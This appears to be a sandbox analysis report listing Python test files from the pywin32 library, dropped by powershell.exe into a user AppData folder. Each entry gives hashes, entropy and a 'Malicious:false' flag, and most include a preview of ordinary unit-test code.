                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\test\test_clipboard.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4128
                                                                                                                                                                                                  Entropy (8bit):4.766945925977974
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:l983zkCeM2cH6EXhnHXQetwU3CzTIVJM4WOdzEa9TIVNWdx17a0d2jlfS:HSzQncjA09SzTIVJiS9TIVwdxE0d2jlq
                                                                                                                                                                                                  MD5:707A3C38CA9599DEE8D886F84AC1048C
                                                                                                                                                                                                  SHA1:F3A07C7B293C479A48631895FEE5FC7B72ED45C1
                                                                                                                                                                                                  SHA-256:CC1A7875EF1EC4B6B5C50FCFA5EE92D386E69EF6DF4DB2FF6F4E8B081E16A0B2
                                                                                                                                                                                                  SHA-512:1B1D2FA8F2C469178DA6C93926C5BFF38CA3050B17AE857E3321EAEC37E7D9C96C96C52D13A249F5D8E335092D960DCE74EA89A816692DD02AD6CF35AA074922
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# General test module for win32api - please add some :).import array.import os.import sys.import unittest..import pywintypes.import win32con.import win32gui.from pywin32_testutil import str2bytes.from win32clipboard import *..custom_format_name = "PythonClipboardTestFormat"...class CrashingTestCase(unittest.TestCase):. def test_722082(self):. class crasher(object):. pass.. obj = crasher(). OpenClipboard(). try:. EmptyClipboard(). # This used to crash - now correctly raises type error.. self.assertRaises(TypeError, SetClipboardData, 0, obj). finally:. CloseClipboard()...class TestBitmap(unittest.TestCase):. def setUp(self):. self.bmp_handle = None. try:. this_file = __file__. except NameError:. this_file = sys.argv[0]. this_dir = os.path.dirname(this_file). self.bmp_name = os.path.join(. os.path.abspath(this_dir), "..", "Demo

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\test\test_exceptions.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8401
                                                                                                                                                                                                  Entropy (8bit):4.658954261945094
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:So/OWyYIRBuPHT7+F32bA2SV+SCJE+SCJbu1pZV2+SY1QN95pxJUyXRvUgLIUqr8:/rnPNFNiZrj1C5TJUng8YhYDQWq
                                                                                                                                                                                                  MD5:EA5E07027F4DBF3C8BB1196FAAF915A2
                                                                                                                                                                                                  SHA1:47CBA1C28BBFD1B9EB4E152B5B869BB6E10765DF
                                                                                                                                                                                                  SHA-256:242D1EA4E8096B43DB499870C4EDFA10EDA5F43B72BB8C7530D8ED8CC27D78F3
                                                                                                                                                                                                  SHA-512:94435C3A55280F9B818A4728C3B78258AF09F2FBD88521EDEA4B7ED8611A5025F9E972A18B13D433FE496BC8670D53C542F46239386E25D7124875CC52A53428
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Test pywin32's error semantics""".import sys.import unittest..import pythoncom.import pywintypes.import win32api.import win32file.import winerror...class TestBase(unittest.TestCase):. def _testExceptionIndex(self, exc, index, expected):. # check the exception itself can be indexed if not py3k. if sys.version_info < (3,):. self.assertEqual(exc[index], expected). # and that exception.args can is the same.. self.assertEqual(exc.args[index], expected)...class TestAPISimple(TestBase):. def _getInvalidHandleException(self):. try:. win32api.CloseHandle(1). except win32api.error as exc:. return exc. self.fail("Didn't get invalid-handle exception.").. def testSimple(self):. self.assertRaises(pywintypes.error, win32api.CloseHandle, 1).. def testErrnoIndex(self):. exc = self._getInvalidHandleException(). self._testExceptionIndex(exc, 0, winerror.ERROR_INVALID_HANDLE).. def test

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\test\test_odbc.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8472
                                                                                                                                                                                                  Entropy (8bit):4.201102143048348
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:gUhWzBHkMBDTwqO10iXNMy0Re5qN/iXb1iES61Ypz6jYpMQUkXlsK9SH2F2fupUO:gUCMmeMym/I1RBLup2q
                                                                                                                                                                                                  MD5:BD17A4E829646A8C6BFD0AD0E92C33D1
                                                                                                                                                                                                  SHA1:7C73924F5EE596727E9B2D09F5053CCA3D5ED402
                                                                                                                                                                                                  SHA-256:C1915D09E993B9A0ADD6473CDF1875ECE33242560FA283D4799F191F8D7CB40D
                                                                                                                                                                                                  SHA-512:64EBF976C4AE5C1193CD9C5B811B133B227E040F5BE17738A0F684C3BFB0F0DB10665A880A4E429A732A1FA258344A575CFA7CAB941D086B82EB2B8B87CDDDD9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# odbc test suite kindly contributed by Frank Millman..import os.import sys.import tempfile.import unittest..import odbc.import pythoncom.from pywin32_testutil import TestSkipped, str2bytes, str2memory.from win32com.client import constants..# We use the DAO ODBC driver.from win32com.client.gencache import EnsureDispatch...class TestStuff(unittest.TestCase):. def setUp(self):. self.tablename = "pywin32test_users". self.db_filename = None. self.conn = self.cur = None. try:. # Test any database if a connection string is supplied.... conn_str = os.environ["TEST_ODBC_CONNECTION_STRING"]. except KeyError:. # Create a local MSAccess DB for testing.. self.db_filename = tempfile.NamedTemporaryFile().name + ".mdb".. # Create a brand-new database - what is the story with these?. for suffix in (".36", ".35", ".30"):. try:. dbe = EnsureDispatch("DAO.DBEngine" + s

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\test\test_pywintypes.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4174
                                                                                                                                                                                                  Entropy (8bit):4.637672143449211
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:tNosBlfXH+L5MWcs+dS4UOFHFaobEUo8hHFcocGu2E+SRNATocQSRNW6h6zJsajn:v7BlmTsrMobDo8VCddeD6VThwUflkoYq
                                                                                                                                                                                                  MD5:A35DD3413F96F8865095071BA336714D
                                                                                                                                                                                                  SHA1:040F057F3A635E26C6DC118431707F7A537C69D2
                                                                                                                                                                                                  SHA-256:5BACA647B02030064503F9F3AEEB3D9BA60DB7F6CAC841AB0E482EF686D67A7E
                                                                                                                                                                                                  SHA-512:8B623CFA039D136860BDEB8795E385D7DDDB80B9BC617CF88788B6E3E19DC2AD3B3BDB4A47CB11403F6E4866F3E49B2E10A201D1513A638A513875D554C80592
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import datetime.import operator.import sys.import time.import unittest..import pywintypes.from pywin32_testutil import ob2memory, str2bytes...class TestCase(unittest.TestCase):. def testPyTimeFormat(self):. struct_current = time.localtime(). pytime_current = pywintypes.Time(struct_current). # try and test all the standard parts of the format. # Note we used to include '%Z' testing, but that was pretty useless as. # it always returned the local timezone.. format_strings = "%a %A %b %B %c %d %H %I %j %m %M %p %S %U %w %W %x %X %y %Y". for fmt in format_strings.split():. v1 = pytime_current.Format(fmt). v2 = time.strftime(fmt, struct_current). self.assertEqual(v1, v2, "format %s failed - %r != %r" % (fmt, v1, v2)).. def testPyTimePrint(self):. # This used to crash with an invalid, or too early time.. # We don't really want to check that it does cause a ValueError. # (as hopefully t

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\test\test_security.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6062
                                                                                                                                                                                                  Entropy (8bit):4.7616285907258655
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:04wcdxEB2ZSCeZQB1ZLp7CeH/ofXhGhFXhvhCue9quC6gNBn/9zZ9C/WflV9y5+C:nrEB2ZSFeZ97FApULJCxA1Xi
                                                                                                                                                                                                  MD5:6CA4F005229E95EEC6E06F171FADC39D
                                                                                                                                                                                                  SHA1:3329FA02380512F6D6FF6F4A90B3B8CDB740290F
                                                                                                                                                                                                  SHA-256:C03DA11EE20F451145E9988056BF247E60F1FF16F91D3592F8537E420BE0DAC7
                                                                                                                                                                                                  SHA-512:9127B7140C9A0FFFD02B12D9728DE19DE4BB0254DA8841FA43E23DB3CF14FD3AF89F45A3B2D909C1ABB115B6D2869CC9260FF4D7F20B86DBB8825FAA5DBA17C8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Tests for the win32security module..import unittest..import ntsecuritycon.import pywintypes.import win32api.import win32con.import win32security.import winerror.from pywin32_testutil import TestSkipped, ob2memory, testmain...class SecurityTests(unittest.TestCase):. def setUp(self):. self.pwr_sid = win32security.LookupAccountName("", "Power Users")[0]. try:. self.admin_sid = win32security.LookupAccountName("", "Administrator")[0]. except pywintypes.error as exc:. # in automation we see:. # pywintypes.error: (1332, 'LookupAccountName', 'No mapping between account names and security IDs was done.'). if exc.winerror != winerror.ERROR_NONE_MAPPED:. raise. self.admin_sid = None.. def tearDown(self):. pass.. def testEqual(self):. if self.admin_sid is None:. raise TestSkipped("No 'Administrator' account is available"). self.assertEqual(. win32security

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\test\test_sspi.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8302
                                                                                                                                                                                                  Entropy (8bit):4.875534408590997
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:FBX6jbS83P2gdpH7LS8iiNdD2gXQR6cDGeQ7hS2R3EHQC4JwOkyB5D4BGQaFHT8T:FMjxy8eQ4jTLX
                                                                                                                                                                                                  MD5:EE93B23110B338A67D7B16EE25FA9C74
                                                                                                                                                                                                  SHA1:57DECEBFD48BE30E7FC3BEB2F6D918EB4254211A
                                                                                                                                                                                                  SHA-256:F47AB384C7FB9F7A91DF36A23AA2FE04F24F0C4263C00227DA6295119A32E98C
                                                                                                                                                                                                  SHA-512:2613DA7651AA4B78992742ECE85726AA3E14D979C73C90B2D2C9BB2A4ACE11BA1EB8E9442B5F72DF54B2E1A10F0B5545A23FFB9A987A2EB5BFF1452069019A8B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Some tests of the win32security sspi functions..# Stolen from Roger's original test_sspi.c, a version of which is in "Demos".# See also the other SSPI demos..import re.import unittest..import sspi.import sspicon.import win32api.import win32security.from pywin32_testutil import TestSkipped, str2bytes, testmain...# It is quite likely that the Kerberos tests will fail due to not being.# installed. The NTLM tests do *not* get the same behaviour as they should.# always be there..def applyHandlingSkips(func, *args):. try:. return func(*args). except win32api.error as exc:. if exc.winerror in [. sspicon.SEC_E_NO_CREDENTIALS,. sspicon.SEC_E_NO_AUTHENTICATING_AUTHORITY,. ]:. raise TestSkipped(exc). raise...class TestSSPI(unittest.TestCase):. def assertRaisesHRESULT(self, hr, func, *args):. try:. return func(*args). raise RuntimeError("expecting %s failure" % (hr,)). except win32security.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\test\test_win32api.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9777
                                                                                                                                                                                                  Entropy (8bit):4.737552851480279
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:DnnthSWhtC9JDMNUT6BykBhRGmRBKKbbq:DHwnTkhBSSy
                                                                                                                                                                                                  MD5:9594739675AC8888353B9128957829E3
                                                                                                                                                                                                  SHA1:C5238B021894FC502967B174245558371E60AC51
                                                                                                                                                                                                  SHA-256:7E4C25D092C23E3B72EE250646723A651FDF01D8897A9B070CA9D14974BC2B5B
                                                                                                                                                                                                  SHA-512:C5F80160BBA272FD56B3E8D34796CE6F55C772FC1B8B2EEA8FC8AB3E4E8A20234DFA4ADAE18D6A41688BC03D98CA92A35C74C19E457836E5BB4C520E5CDC874E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# General test module for win32api - please add some :)..import datetime.import os.import sys.import tempfile.import unittest..import win32api.import win32con.import win32event.import winerror.from pywin32_testutil import TestSkipped, str2bytes...class CurrentUserTestCase(unittest.TestCase):. def testGetCurrentUser(self):. domain = win32api.GetDomainName(). if domain == "NT AUTHORITY":. # Running as a service account, so the comparison will fail. raise TestSkipped("running as service account"). name = "%s\\%s" % (domain, win32api.GetUserName()). self.assertEqual(name, win32api.GetUserNameEx(win32api.NameSamCompatible))...class TestTime(unittest.TestCase):. def testTimezone(self):. # GetTimeZoneInformation. rc, tzinfo = win32api.GetTimeZoneInformation(). if rc == win32con.TIME_ZONE_ID_DAYLIGHT:. tz_str = tzinfo[4]. tz_time = tzinfo[5]. else:. tz_str = tzinfo[1].

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\test\test_win32crypt.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4348
                                                                                                                                                                                                  Entropy (8bit):4.720005452927387
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:nGTNTZHftZ6VavazzOwoG+NbJXGa/Y7/fNSLGhLOL/LpFyQTu1nPyi:nGTNVYPOw3kW6YwQSz3yzpai
                                                                                                                                                                                                  MD5:1CF5B09510844FF5502DC5B220560F95
                                                                                                                                                                                                  SHA1:A0897F1482D46F77E6495F3F7AFC104899539A26
                                                                                                                                                                                                  SHA-256:C26885E898631804BB04402F9976AE2BE813C96E43491CFDC52A9081A12C8FD7
                                                                                                                                                                                                  SHA-512:6590871E9392D4A48E74B31DBF4B8A053C6C4807E74857A987D57D93D0D13B493144BC6582E08FA426131DA230B8D4C4CD9165499A0ECAC534AA2AF2D97C153D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Test module for win32crypt..import contextlib.import unittest.from typing import Any, Iterator..import win32crypt.from pywin32_testutil import TestSkipped, find_test_fixture, testmain.from win32cryptcon import *...class Crypt(unittest.TestCase):. def testSimple(self):. data = b"My test data". entropy = None. desc = "My description". flags = 0. ps = None. blob = win32crypt.CryptProtectData(data, desc, entropy, None, ps, flags). got_desc, got_data = win32crypt.CryptUnprotectData(. blob, entropy, None, ps, flags. ). self.assertEqual(data, got_data). self.assertEqual(desc, got_desc).. def testEntropy(self):. data = b"My test data". entropy = b"My test entropy". desc = "My description". flags = 0. ps = None. blob = win32crypt.CryptProtectData(data, desc, entropy, None, ps, flags). got_desc, got_data = win32crypt.CryptUnprotectData(. blob, entro

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\test\test_win32event.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4368
                                                                                                                                                                                                  Entropy (8bit):4.690266362009521
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:uBZpBvpjiDWFpjSXSjvDpwWlXySJH6jHN6HzS5V6pLqx7rLK0EI1ZcVZ3q:gfBvZiDWFZSXSjvDpwWUS16TNUzFpLq5
                                                                                                                                                                                                  MD5:DBC9AF40F38CB83121A9E353B9E9F4DC
                                                                                                                                                                                                  SHA1:843B250EA21D3143DA09A8FA1151C95753A9D65B
                                                                                                                                                                                                  SHA-256:5D0A81BDAF6B31854D8AEEE3026C2120C7A9CE67BA7E721DEE59BBC502D37B0E
                                                                                                                                                                                                  SHA-512:B2BB5BAE444FAD9EDC744B36134747F994619DA1112092D4B6E66A07FED93D0358795CEBE324EC42CC3D5238C8E9738DFE0201B03DCD35016606A33121AB2158
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import unittest..import pywintypes.import win32event...class TestWaitableTimer(unittest.TestCase):. def testWaitableFire(self):. h = win32event.CreateWaitableTimer(None, 0, None). dt = -160 # 160 ns.. win32event.SetWaitableTimer(h, dt, 0, None, None, 0). rc = win32event.WaitForSingleObject(h, 1000). self.assertEqual(rc, win32event.WAIT_OBJECT_0).. def testCreateWaitableTimerEx(self):. h = win32event.CreateWaitableTimerEx(. None,. None,. win32event.CREATE_WAITABLE_TIMER_HIGH_RESOLUTION,. win32event.TIMER_ALL_ACCESS,. ). dt = -160 # 160 ns.. win32event.SetWaitableTimer(h, dt, 0, None, None, 0). rc = win32event.WaitForSingleObject(h, 1000). self.assertEqual(rc, win32event.WAIT_OBJECT_0).. def testWaitableTrigger(self):. h = win32event.CreateWaitableTimer(None, 0, None). # for the sake of this, pass a long that doesn't fit in an int.. dt =

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\test\test_win32file.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):41414
                                                                                                                                                                                                  Entropy (8bit):4.594168917066703
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:cIh0aKGyRwRGUtfoKkTu3zCz69SNrCs9MNzz:cIcUSK59SNl6
                                                                                                                                                                                                  MD5:B01817532C78A687745ACA880BD3EA14
                                                                                                                                                                                                  SHA1:0FA966057DA2955C9210E9BD87ED461B5EE1258C
                                                                                                                                                                                                  SHA-256:A1593D886BBA6F5CBE6C3DC35E11F8FD4655BAAEAAB8FA13B0121F6E06200FEF
                                                                                                                                                                                                  SHA-512:09B9FD7341C605E83DC2B66F375CDC5148D340EF9290D229EF64E1932C9EF3EAC98D3F99262F1449EE3A2646969566D349D9151FEBBE69BAFED9CC57EFE2FA38
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import datetime.import os.import random.import shutil.import socket.import tempfile.import threading.import time.import unittest..import ntsecuritycon.import pywintypes.import win32api.import win32con.import win32event.import win32file.import win32pipe.import win32timezone.import winerror.from pywin32_testutil import TestSkipped, str2bytes, testmain..try:. set.except NameError:. from sets import Set as set...class TestReadBuffer(unittest.TestCase):. def testLen(self):. buffer = win32file.AllocateReadBuffer(1). self.assertEqual(len(buffer), 1).. def testSimpleIndex(self):. buffer = win32file.AllocateReadBuffer(1). buffer[0] = 0xFF. self.assertEqual(buffer[0], 0xFF).. def testSimpleSlice(self):. buffer = win32file.AllocateReadBuffer(2). val = str2bytes("\0\0"). buffer[:2] = val. self.assertEqual(buffer[0:2], val)...class TestSimpleOps(unittest.TestCase):. def testSimpleFiles(self):. fd, filename = tem

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\test\test_win32gui.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2302
                                                                                                                                                                                                  Entropy (8bit):4.717077495501314
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:bWT/FjXsP4D4O4AzIpbWsdKMns71gnswF7AIs72RrsibpVS:iTdj7EDAzu7KMB/NJ5bfS
                                                                                                                                                                                                  MD5:9839103A9BD6F1BAF4EAE2B7049BB275
                                                                                                                                                                                                  SHA1:88D504A84342DDF66DEB4DE8D8441B8F976C6611
                                                                                                                                                                                                  SHA-256:25938BF01CCD24988D82267FDEC66EB77AB4391B979664C63408F3F5E1D4EEAD
                                                                                                                                                                                                  SHA-512:1B9BBA0BBCD2826757BAB4C063485C9C8938CAD6552D00ACD2ECCEAB0FFC5F3B5C2F6E55A77A16EB36D02E9DB5866A7979E941CE22F9C43955890F8848719127
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# tests for win32gui.import array.import operator.import unittest..import pywin32_testutil.import win32gui...class TestPyGetString(unittest.TestCase):. def test_get_string(self):. # test invalid addresses cause a ValueError rather than crash!. self.assertRaises(ValueError, win32gui.PyGetString, 0). self.assertRaises(ValueError, win32gui.PyGetString, 1). self.assertRaises(ValueError, win32gui.PyGetString, 1, 1)...class TestPyGetMemory(unittest.TestCase):. def test_ob(self):. # Check the PyGetMemory result and a bytes string can be compared. test_data = b"\0\1\2\3\4\5\6". c = array.array("b", test_data). addr, buflen = c.buffer_info(). got = win32gui.PyGetMemory(addr, buflen). self.assertEqual(len(got), len(test_data)). self.assertEqual(bytes(got), test_data).. def test_memory_index(self):. # Check we can index into the buffer object returned by PyGetMemory. test_data = b"\0\1\2\3\4\5\6".

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\test\test_win32guistruct.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9207
                                                                                                                                                                                                  Entropy (8bit):4.533453807750783
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:nWriufXQ/QFNgSE/wFNNLeWt6bETl3RVFHg1BE2xdF+V1K++V3b6vXEFcccUTcH2:exXGQFNgSywFNNLdtqrXTKXnVXHWXwq
                                                                                                                                                                                                  MD5:70BD28AEBE79AF642176356266E86D33
                                                                                                                                                                                                  SHA1:FBCA88DB18EAAF543337A1000A98AAD79334B27C
                                                                                                                                                                                                  SHA-256:90D0EA872D2FBF16E54A88674A9757C6A0C1E017E32D18B9ED2BEF4D1F9790C0
                                                                                                                                                                                                  SHA-512:9A83B04471386AAEB6784333027817724BBA387991E6E0686D047B6170624DFE27517E7C40FEED775429C0D5C2595ACB525E1F12FADC436AEB0E99C641EF140D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import array.import unittest..import pythoncom.import win32con.import win32gui.import win32gui_struct...class TestBase(unittest.TestCase):. def assertDictEquals(self, d, **kw):. checked = dict(). for n, v in kw.items():. self.assertEqual(v, d[n], "'%s' doesn't match: %r != %r" % (n, v, d[n])). checked[n] = True. checked_keys = list(checked.keys()). passed_keys = list(kw.keys()). checked_keys.sort(). passed_keys.sort(). self.assertEqual(checked_keys, passed_keys)...class TestMenuItemInfo(TestBase):. def _testPackUnpack(self, text):. vals = dict(. fType=win32con.MFT_MENUBARBREAK,. fState=win32con.MFS_CHECKED,. wID=123,. hSubMenu=1234,. hbmpChecked=12345,. hbmpUnchecked=123456,. dwItemData=1234567,. text=text,. hbmpItem=321,. ). mii, extras = win32gui_struct.PackMENUITEMINFO(**vals). (.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\test\test_win32inet.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3119
                                                                                                                                                                                                  Entropy (8bit):4.5523866481379365
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:zfKwKrRJv8sWEFOphvScSkXGSOW8Ra8Ti:qPtcScSDVRri
                                                                                                                                                                                                  MD5:30F3C8445F7A56D3A6A07D084086F837
                                                                                                                                                                                                  SHA1:6AF609BF8A6FED9C17C5AFA907B2E13D01280F4D
                                                                                                                                                                                                  SHA-256:FC5CDEC444E91779C64EB1BFCA9C089F3EC5FDDA916C857C79C436417834F3C2
                                                                                                                                                                                                  SHA-512:2AF989A15B3DB5029104BA44CB37CE2E96F59E0BFF9396921419C1E9D26C51BA9A93679AF0C7F31DF463185DE81990DE6D6DA64C8ED8D2210818B9E4CDB177BC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import unittest..import winerror.from pywin32_testutil import str2bytes # py3k-friendly helper.from pywin32_testutil import TestSkipped, testmain.from win32inet import *.from win32inetcon import *...class CookieTests(unittest.TestCase):. def testCookies(self):. data = "TestData=Test". InternetSetCookie("http://www.python.org", None, data). got = InternetGetCookie("http://www.python.org", None). # handle that there might already be cookies for the domain.. bits = map(lambda x: x.strip(), got.split(";")). self.assertTrue(data in bits).. def testCookiesEmpty(self):. try:. InternetGetCookie("http://site-with-no-cookie.python.org", None). self.fail("expected win32 exception"). except error as exc:. self.assertEqual(exc.winerror, winerror.ERROR_NO_MORE_ITEMS)...class UrlTests(unittest.TestCase):. def testSimpleCanonicalize(self):. ret = InternetCanonicalizeUrl("foo bar"). self.ass

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\test\test_win32net.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):654
                                                                                                                                                                                                  Entropy (8bit):4.2763245113043284
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:LLfJ4LfzmlIuXi7aL9xrClXlfvNKEdtevSobuXi1FC7hGtfTteNy2pV7u:JumlIKIaL9x2JlfVKE1eK40sUHpVS
                                                                                                                                                                                                  MD5:6517E211765BE18E6404AFDD997C8BF0
                                                                                                                                                                                                  SHA1:0624B162D53626409F7E2695EDEF22D8A2BE4AC3
                                                                                                                                                                                                  SHA-256:C16266E7473FBED90C72820700F36236FCDC3E103A8D7EC38D990514245B7D79
                                                                                                                                                                                                  SHA-512:A28CD960ED1F4F23176AF14980B81315A3AC85645FFBE4745A4762B9A8A93071FED11CE4DCFEBBBDA6B7F3530ACFB6129C18966CD1367B0FD02C088DBFE0051C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import unittest..import win32net.import win32netcon...class TestCase(unittest.TestCase):. def testGroupsGoodResume(self, server=None):. res = 0. level = 0 # setting it to 1 will provide more detailed info. while True:. (user_list, total, res) = win32net.NetGroupEnum(server, level, res). for i in user_list:. pass. if not res:. break.. def testGroupsBadResume(self, server=None):. res = 1 # Can't pass this first time round.. self.assertRaises(win32net.error, win32net.NetGroupEnum, server, 0, res)...if __name__ == "__main__":. unittest.main().

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\test\test_win32pipe.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5007
                                                                                                                                                                                                  Entropy (8bit):4.707530904909143
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:jvp065vE0nI1jmQ4cOYBXc6YBkycTPk0Cczq:7nI16Q4cOYBXc6YBkycTPk0Cczq
                                                                                                                                                                                                  MD5:82B8034B800E3839C5A973E495B91D10
                                                                                                                                                                                                  SHA1:CB1A55C670BED07E8A2C4E1C5643CB9E4FE27276
                                                                                                                                                                                                  SHA-256:6A564ED70F0E79A5ED160540A0A5B2405E4BF404930B431FB8B743C6F8C176EB
                                                                                                                                                                                                  SHA-512:FFCB2522AB15717DF4D687CA14CCDD3B5B7D8B7D2423BB92C94EB4919D7FF223A145AFEB9FA77AADE1F8B27202561911230A05600469BD80DEE64021A2D9C810
                                                                                                                                                                                                  Malicious:false
